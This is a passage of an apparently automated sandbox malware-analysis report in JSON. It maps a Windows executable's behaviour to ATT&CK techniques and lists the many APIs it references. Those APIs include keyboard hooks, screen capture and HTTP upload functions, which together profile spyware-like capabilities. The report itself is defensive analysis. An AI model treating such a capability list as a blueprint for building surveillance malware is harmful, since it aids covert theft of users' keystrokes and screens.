\"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\908501218x27.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\x27x.dll\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"RegEnumValueA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"Process32First\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"lstrlenA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"lstrcmpiA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"SizeofResource\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"LockResource\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"WinExec\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"OpenMutexA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"MapViewOfFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"lstrcatA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CreateFileMappingA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"LoadResource\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"lstrcpyA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"Sleep\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"OutputDebugStringA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"FindResourceA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetWindowTextA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetMessageA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"EnumWindows\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"wsprintfA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"lstrcmpA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"lstrcpynA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GlobalFree\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GlobalUnlock\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GlobalLock\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GlobalAlloc\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"OpenFileMappingA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"ReleaseDC\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetDC\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"IsRectEmpty\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"FindWindowExA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"FindWindowA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"SetForegroundWindow\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetActiveWindow\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"IsIconic\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetSystemMetrics\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CallNextHookEx\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"SetWindowsHookExA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"UnhookWindowsHookEx\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"PostThreadMessageA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetDIBits\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetStockObject\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetObjectA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"DeleteDC\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"GetDeviceCaps\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CreateDCA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"DeleteObject\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"BitBlt\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"SelectObject\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CreateCompatibleBitmap\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"CreateCompatibleDC\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"InternetQueryDataAvailable\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"HttpEndRequestA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"InternetWriteFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"HttpSendRequestExA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"HttpAddRequestHeadersA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"InternetConnectA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API (Indicator: \"OutputDebugStringA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp, 00000000-00004528.00000000.138687.1000B000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpyA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcmpA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcmpiA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpynA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalFree\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalUnlock\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalLock\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalAlloc\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"MapViewOfFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"OpenFileMappingA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"ReleaseDC\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDC\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsRectEmpty\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindWindowExA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindWindowA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetForegroundWindow\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsIconic\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowTextA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnumWindows\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"CallNextHookEx\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetWindowsHookExA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"UnhookWindowsHookEx\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"PostThreadMessageA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDIBits\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStockObject\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetObjectA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteDC\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDeviceCaps\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateDCA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteObject\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"BitBlt\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"SelectObject\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateCompatibleBitmap\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateCompatibleDC\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"InternetQueryDataAvailable\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"HttpEndRequestA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"InternetWriteFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"HttpSendRequestExA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"HttpAddRequestHeadersA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 